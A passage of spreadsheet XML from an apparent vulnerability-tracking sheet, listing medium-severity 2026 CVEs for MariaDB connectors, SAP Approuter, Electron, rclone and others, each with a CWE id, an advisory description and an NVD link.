          <t>java, mysql</t>
        </is>
      </c>
      <c r="H4442" s="5" t="inlineStr"/>
      <c r="I4442" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J4442" s="5" t="inlineStr"/>
      <c r="K4442" s="5" t="inlineStr">
        <is>
          <t>CWE-319, CWE-522</t>
        </is>
      </c>
      <c r="L4442" s="5" t="inlineStr">
        <is>
          <t>MariaDB Connector/J is used to connect applications developed in Java to MariaDB and MySQL databases. Prior to 2.7.14, 3.3.5, 3.4.3, and 3.5.9, PAM dialog authentication can be coerced into transmitting the account password over an insecure connection. The mysql_clear_password plugin is gated behind a secure transport, but the sibling PAM handler SendPamAuthPacketFactory, named dialog by the server, does not declare that requirement and inherits the default secure-required value false; older branches implement the same affected behavior in SendPamAuthPacket. A hostile or man-in-the-middle server can send an Authentication Switch Request for dialog over plain TCP, causing the driver to return the user's password in cleartext when sslMode=DISABLE and restrictedAuth=null, which is the default configuration. Properly verified TLS and local Unix sockets are not exposed to this transport vector. This issue is fixed in versions 2.7.14, 3.3.5, 3.4.3, and 3.5.9.</t>
        </is>
      </c>
      <c r="M4442" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55857</t>
        </is>
      </c>
    </row>
    <row r="4443">
      <c r="A4443" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4443" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55858</t>
        </is>
      </c>
      <c r="C4443" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4443" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4443" s="5" t="inlineStr"/>
      <c r="F4443" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4443" s="5" t="inlineStr">
        <is>
          <t>java, mysql</t>
        </is>
      </c>
      <c r="H4443" s="5" t="inlineStr"/>
      <c r="I4443" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J4443" s="5" t="inlineStr"/>
      <c r="K4443" s="5" t="inlineStr">
        <is>
          <t>CWE-838</t>
        </is>
      </c>
      <c r="L4443" s="5" t="inlineStr">
        <is>
          <t>MariaDB Connector/J is used to connect applications developed in Java to MariaDB and MySQL databases. Prior to 2.7.14, 3.3.5, 3.4.3, and 3.5.9, the connector encodes and decodes protocol text and performs client-side escaping under the assumption that the connection character set is UTF-8. The server can report a mid-session change to character_set_client through OK-packet session-state tracking, including a change caused by SET NAMES, a stored routine or trigger, server configuration, or a hostile server. If character_set_client changes to a non-UTF-8 value, the driver continues to read and write UTF-8 while the server interprets the same bytes under another encoding, causing silent data corruption and a client/server charset-confusion mismatch that can defeat byte-wise quoting or escaping. The fix accepts only utf8, utf8mb3, or utf8mb4 after initialization; any other value causes SQLException with SQLState 08000 and closes the connection. This issue is fixed in versions 2.7.14, 3.3.5, 3.4.3, and 3.5.9.</t>
        </is>
      </c>
      <c r="M4443" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55858</t>
        </is>
      </c>
    </row>
    <row r="4444">
      <c r="A4444" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4444" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55859</t>
        </is>
      </c>
      <c r="C4444" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4444" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4444" s="5" t="inlineStr"/>
      <c r="F4444" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4444" s="5" t="inlineStr">
        <is>
          <t>java, mysql</t>
        </is>
      </c>
      <c r="H4444" s="5" t="inlineStr"/>
      <c r="I4444" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J4444" s="5" t="inlineStr"/>
      <c r="K4444" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-838</t>
        </is>
      </c>
      <c r="L4444" s="5" t="inlineStr">
        <is>
          <t>MariaDB Connector/R2DBC is a non-blocking MariaDB and MySQL client implemented in Java. Prior to 1.4.1, org.mariadb:r2dbc-mariadb encodes and decodes all character data under the assumption that the connection character set is UTF-8. A server can announce a mid-session change to character_set_client through the OK-packet session-state-tracking mechanism, including through SET NAMES executed by a stored routine or trigger, server configuration, or a hostile or man-in-the-middle server. If the new character set is not UTF-8, the driver continues to exchange UTF-8 while the server interprets the same bytes under a different encoding, causing silent data corruption and a client/server charset-confusion mismatch that can defeat byte-wise quoting or escaping. The fix accepts only utf8, utf8mb3, or utf8mb4 after initialization; any other value raises R2dbcNonTransientResourceException with SQLState 08000 and closes the connection. This issue is fixed in version 1.4.1.</t>
        </is>
      </c>
      <c r="M4444" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55859</t>
        </is>
      </c>
    </row>
    <row r="4445">
      <c r="A4445" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4445" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55860</t>
        </is>
      </c>
      <c r="C4445" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4445" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4445" s="5" t="inlineStr"/>
      <c r="F4445" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4445" s="5" t="inlineStr">
        <is>
          <t>java, mysql</t>
        </is>
      </c>
      <c r="H4445" s="5" t="inlineStr"/>
      <c r="I4445" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J4445" s="5" t="inlineStr"/>
      <c r="K4445" s="5" t="inlineStr">
        <is>
          <t>CWE-319, CWE-522</t>
        </is>
      </c>
      <c r="L4445" s="5" t="inlineStr">
        <is>
          <t>MariaDB Connector/R2DBC is a non-blocking MariaDB and MySQL client implemented in Java. Prior to 1.4.1, org.mariadb:r2dbc-mariadb does not gate clear-text password authentication plugins on transport encryption because the AuthenticationPlugin interface has no capability for a plugin to require a secure connection. A hostile or man-in-the-middle MariaDB server can send an AuthSwitchRequest naming mysql_clear_password or dialog (PAM) over a plain-TCP unencrypted connection, and AuthenticationFlow permits ClearPasswordPluginFlow or PamPluginFlow to return the user's password as cleartext bytes on the wire. The disclosed credentials can subsequently be used to authenticate directly to the database server. This issue is fixed in version 1.4.1.</t>
        </is>
      </c>
      <c r="M4445" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55860</t>
        </is>
      </c>
    </row>
    <row r="4446">
      <c r="A4446" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4446" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58237</t>
        </is>
      </c>
      <c r="C4446" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4446" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4446" s="5" t="inlineStr"/>
      <c r="F4446" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4446" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H4446" s="5" t="inlineStr">
        <is>
          <t>sap:approuter</t>
        </is>
      </c>
      <c r="I4446" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J4446" s="5" t="inlineStr"/>
      <c r="K4446" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4446" s="5" t="inlineStr">
        <is>
          <t>WebSocket of SAP Approuter does not perform sufficient authorization checks in certain functionality. An attacker with low privileges could exploit this to access restricted functionality. Successful exploitation could allow the attacker to read sensitive information and perform limited modifications, resulting in a high impact on confidentiality and a low impact on integrity. There is no impact on availability.</t>
        </is>
      </c>
      <c r="M4446" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58237</t>
        </is>
      </c>
    </row>
    <row r="4447">
      <c r="A4447" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4447" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58238</t>
        </is>
      </c>
      <c r="C4447" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4447" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4447" s="5" t="inlineStr"/>
      <c r="F4447" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4447" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H4447" s="5" t="inlineStr">
        <is>
          <t>sap:approuter</t>
        </is>
      </c>
      <c r="I4447" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J4447" s="5" t="inlineStr"/>
      <c r="K4447" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L4447" s="5" t="inlineStr">
        <is>
          <t>SAP Approuter does not sufficiently handle certain requests under specific conditions. An unauthenticated attacker could send specially crafted input that causes the component to crash and restart. Successful exploitation requires specific runtime conditions to be met, making the attack complex to execute. This results in a high impact on availability. There is no impact on confidentiality and integrity.</t>
        </is>
      </c>
      <c r="M4447" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58238</t>
        </is>
      </c>
    </row>
    <row r="4448">
      <c r="A4448" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4448" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61614</t>
        </is>
      </c>
      <c r="C4448" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4448" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4448" s="5" t="inlineStr"/>
      <c r="F4448" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4448" s="5" t="inlineStr"/>
      <c r="H4448" s="5" t="inlineStr"/>
      <c r="I4448" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4448" s="5" t="inlineStr"/>
      <c r="K4448" s="5" t="inlineStr">
        <is>
          <t>CWE-598</t>
        </is>
      </c>
      <c r="L4448" s="5" t="inlineStr">
        <is>
          <t>SolidInvoice is an open-source invoicing platform. Prior to version 3.0.1, the REST API authenticator accepts bearer tokens via a `?token=` URL query parameter as a fallback to the `X-API-TOKEN` header. This causes long-lived API credentials to be recorded in server access logs, proxy logs, browser history, and HTTP Referer headers sent to third-party origins. Version 3.0.1 fixes the issue.</t>
        </is>
      </c>
      <c r="M4448" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61614</t>
        </is>
      </c>
    </row>
    <row r="4449">
      <c r="A4449" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4449" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66776</t>
        </is>
      </c>
      <c r="C4449" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4449" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4449" s="5" t="inlineStr"/>
      <c r="F4449" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4449" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H4449" s="5" t="inlineStr">
        <is>
          <t>sap:approuter</t>
        </is>
      </c>
      <c r="I4449" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J4449" s="5" t="inlineStr"/>
      <c r="K4449" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L4449" s="5" t="inlineStr">
        <is>
          <t>SAP Approuter does not consistently enforce integrity verification on certain session-related request headers under specific conditions. An attacker with low privileges could send a specially crafted request that bypasses the integrity check and loads another user's session context. Successful exploitation requires the attacker to have previously observed matching session values out-of-band, which makes the attack complex to execute. This could result in a high impact on confidentiality and a low impact on integrity. There is no impact on availability.</t>
        </is>
      </c>
      <c r="M4449" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66776</t>
        </is>
      </c>
    </row>
    <row r="4450">
      <c r="A4450" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4450" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66777</t>
        </is>
      </c>
      <c r="C4450" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4450" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4450" s="5" t="inlineStr"/>
      <c r="F4450" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4450" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H4450" s="5" t="inlineStr">
        <is>
          <t>sap:approuter</t>
        </is>
      </c>
      <c r="I4450" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J4450" s="5" t="inlineStr"/>
      <c r="K4450" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L4450" s="5" t="inlineStr">
        <is>
          <t>SAP Approuter does not sufficiently validate certain incoming requests before forwarding them to backend destinations. Due to the complexity of the required conditions, an attacker with low privileges could send specially crafted requests to bypass authorization checks and reach protected resources beyond their assigned scope. Successful exploitation could allow the attacker to read sensitive data and perform limited modifications on protected resources, resulting in a high impact on confidentiality and a low impact on integrity. There is no impact on availability.</t>
        </is>
      </c>
      <c r="M4450" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66777</t>
        </is>
      </c>
    </row>
    <row r="4451">
      <c r="A4451" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4451" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6727</t>
        </is>
      </c>
      <c r="C4451" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4451" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4451" s="5" t="inlineStr"/>
      <c r="F4451" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4451" s="5" t="inlineStr"/>
      <c r="H4451" s="5" t="inlineStr"/>
      <c r="I4451" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J4451" s="5" t="inlineStr"/>
      <c r="K4451" s="5" t="inlineStr">
        <is>
          <t>CWE-208</t>
        </is>
      </c>
      <c r="L4451" s="5" t="inlineStr">
        <is>
          <t>A timing side-channel vulnerability exists in the RSA OAEP decryption implementation. A privileged local attacker with access to the TPM command interface may be able to exploit timing differences to recover information that could allow decryption of ciphertexts encrypted to TPM-managed RSA keys, including the RSA Endorsement Key (EK), including import blobs, credential blobs, and session salts. Under certain conditions, this may also enable the forgery of TPM 2.0 attestations. Refer to TCGVRT0011.</t>
        </is>
      </c>
      <c r="M4451" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6727</t>
        </is>
      </c>
    </row>
    <row r="4452">
      <c r="A4452" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4452" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67395</t>
        </is>
      </c>
      <c r="C4452" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4452" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4452" s="5" t="inlineStr"/>
      <c r="F4452" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G4452" s="5" t="inlineStr"/>
      <c r="H4452" s="5" t="inlineStr"/>
      <c r="I4452" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J4452" s="5" t="inlineStr"/>
      <c r="K4452" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L4452" s="5" t="inlineStr">
        <is>
          <t>A path traversal vulnerability exists in Sage Employee Self Service’s custom logo functionality due to improper validation of file path parameters. By leveraging directory traversal sequences and their encoded variants, an attacker may bypass directory restrictions and access files outside the application's intended file system scope. Successful exploitation would require knowledge of valid file names and paths.
Depending on the privileges of the affected component, exploitation could result in the disclosure of sensitive information, including configuration files, environment settings, application assets, and log data.
The vulnerability has been remediated through enhanced path validation and secure path resolution controls that prevent access to unauthorised locations.</t>
        </is>
      </c>
      <c r="M4452" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67395</t>
        </is>
      </c>
    </row>
    <row r="4453">
      <c r="A4453" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4453" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68527</t>
        </is>
      </c>
      <c r="C4453" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4453" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4453" s="5" t="inlineStr"/>
      <c r="F4453" s="5" t="inlineStr"/>
      <c r="G4453" s="5" t="inlineStr"/>
      <c r="H4453" s="5" t="inlineStr"/>
      <c r="I4453" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4453" s="5" t="inlineStr"/>
      <c r="K4453" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L4453" s="5" t="inlineStr">
        <is>
          <t>Concrete CMS versions 8.3.0 through 9.5.2 are vulnerable to an authorization bypass in the Calendar event edit dialog (concrete/controllers/dialog/event/edit.php). The dialog checked permissions against the calendar identifier supplied in the request rather than the calendar owning the targeted event occurrence. A user with the "Add Event" permission on a single calendar could read and overwrite events on calendars they were not permitted to access, and could delete an event's original local occurrence. Publishing the injected version to the live calendar, which demotes the previously approved version, additionally required the actor's approve_calendar_event workflow rights or an auto-approving workflow. The Concrete CMS Security Team gave this a rank of 5.9 with CVSS 4.0 vector CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N. Thanks Winston Crooker for reporting.</t>
        </is>
      </c>
      <c r="M4453" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68527</t>
        </is>
      </c>
    </row>
    <row r="4454">
      <c r="A4454" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4454" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69304</t>
        </is>
      </c>
      <c r="C4454" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4454" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4454" s="5" t="inlineStr"/>
      <c r="F4454" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G4454" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H4454" s="5" t="inlineStr"/>
      <c r="I4454" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4454" s="5" t="inlineStr"/>
      <c r="K4454" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="L4454" s="5" t="inlineStr">
        <is>
          <t>Improper handling of highly compressed data (data amplification) in ASP.NET Core allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M4454" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69304</t>
        </is>
      </c>
    </row>
    <row r="4455">
      <c r="A4455" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4455" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69382</t>
        </is>
      </c>
      <c r="C4455" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4455" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4455" s="5" t="inlineStr"/>
      <c r="F4455" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4455" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4455" s="5" t="inlineStr"/>
      <c r="I4455" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4455" s="5" t="inlineStr"/>
      <c r="K4455" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="L4455" s="5" t="inlineStr">
        <is>
          <t>Use of a broken or risky cryptographic algorithm in Microsoft Exchange Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M4455" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69382</t>
        </is>
      </c>
    </row>
    <row r="4456">
      <c r="A4456" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4456" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70091</t>
        </is>
      </c>
      <c r="C4456" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4456" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4456" s="5" t="inlineStr"/>
      <c r="F4456" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G4456" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4456" s="5" t="inlineStr"/>
      <c r="I4456" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4456" s="5" t="inlineStr"/>
      <c r="K4456" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L4456" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows DNS allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M4456" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70091</t>
        </is>
      </c>
    </row>
    <row r="4457">
      <c r="A4457" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4457" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70599</t>
        </is>
      </c>
      <c r="C4457" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4457" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4457" s="5" t="inlineStr"/>
      <c r="F4457" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4457" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4457" s="5" t="inlineStr"/>
      <c r="I4457" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J4457" s="5" t="inlineStr"/>
      <c r="K4457" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="L4457" s="5" t="inlineStr">
        <is>
          <t>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.7, 40.9.0, 41.2.0, and 42.0.0-beta.1, serial-port and media permission checks made from an iframe passed the top-level frame origin to session.setPermissionCheckHandler instead of the requesting iframe origin. Origin-based handler logic could grant a cross-origin iframe device access intended only for the top-level origin. This issue is fixed in 39.8.7, 40.9.0, 41.2.0, and 42.0.0-beta.1.</t>
        </is>
      </c>
      <c r="M4457" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70599</t>
        </is>
      </c>
    </row>
    <row r="4458">
      <c r="A4458" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4458" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70605</t>
        </is>
      </c>
      <c r="C4458" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4458" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4458" s="5" t="inlineStr"/>
      <c r="F4458" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4458" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4458" s="5" t="inlineStr"/>
      <c r="I4458" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J4458" s="5" t="inlineStr"/>
      <c r="K4458" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L4458" s="5" t="inlineStr">
        <is>
          <t>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.8, 40.9.0, 41.2.1, and 42.0.0-beta.3, when following HTTP redirects, net.fetch() and net.request() did not restrict which schemes a redirect could target. A remote server could redirect a request to a local resource, and if the app returns or forwards the response body, local file contents could be disclosed. Apps are only affected if they make net requests to attacker-influenced URLs with redirects followed and expose the response body. This issue is fixed in versions 39.8.8, 40.9.0, 41.2.1, and 42.0.0-beta.3.</t>
        </is>
      </c>
      <c r="M4458" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70605</t>
        </is>
      </c>
    </row>
    <row r="4459">
      <c r="A4459" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4459" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70606</t>
        </is>
      </c>
      <c r="C4459" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4459" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4459" s="5" t="inlineStr"/>
      <c r="F4459" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4459" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4459" s="5" t="inlineStr"/>
      <c r="I4459" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J4459" s="5" t="inlineStr"/>
      <c r="K4459" s="5" t="inlineStr">
        <is>
          <t>CWE-668</t>
        </is>
      </c>
      <c r="L4459" s="5" t="inlineStr">
        <is>
          <t>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 40.10.6, 41.9.1, 42.5.1, and 43.0.0, when a custom protocol handler returned a ProtocolResponse with a url and no session, Electron made the upstream request through defaultSession instead of the session that handled the protocol. A cached response could then be reused across otherwise isolated session partitions. Apps that use ProtocolResponse.url, omit ProtocolResponse.session, and rely on separate sessions to isolate content are affected. This issue is fixed in versions 40.10.6, 41.9.1, 42.5.1, and 43.0.0.</t>
        </is>
      </c>
      <c r="M4459" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70606</t>
        </is>
      </c>
    </row>
    <row r="4460">
      <c r="A4460" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4460" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71310</t>
        </is>
      </c>
      <c r="C4460" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4460" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4460" s="5" t="inlineStr"/>
      <c r="F4460" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4460" s="5" t="inlineStr"/>
      <c r="H4460" s="5" t="inlineStr"/>
      <c r="I4460" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J4460" s="5" t="inlineStr"/>
      <c r="K4460" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L4460" s="5" t="inlineStr">
        <is>
          <t>rclone is a command-line program to sync files and directories to and from different cloud storage providers. Prior to 1.75.0, the shared HTTP CONNECT helper in lib/proxy/http.go parses proxy CONNECT responses with http.ReadResponse over an unrestricted buffered reader, allowing a malicious or compromised configured proxy, or an active on-path actor controlling a plaintext HTTP proxy hop, to send oversized headers that grow memory until the rclone process fails. The affected helper is used by FTP and SFTP proxy connections, and SFTP reaches the parser before SSH server authentication, so target host key validation does not constrain a malicious proxy. This issue is fixed in 1.75.0.</t>
        </is>
      </c>
      <c r="M4460" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71310</t>
        </is>
      </c>
    </row>
    <row r="4461">
      <c r="A4461" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4461" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72978</t>
        </is>
      </c>
      <c r="C4461" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4461" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4461" s="5" t="inlineStr"/>
      <c r="F4461" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G4461" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H4461" s="5" t="inlineStr"/>
      <c r="I4461" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4461" s="5" t="inlineStr"/>
      <c r="K4461" s="5" t="inlineStr">
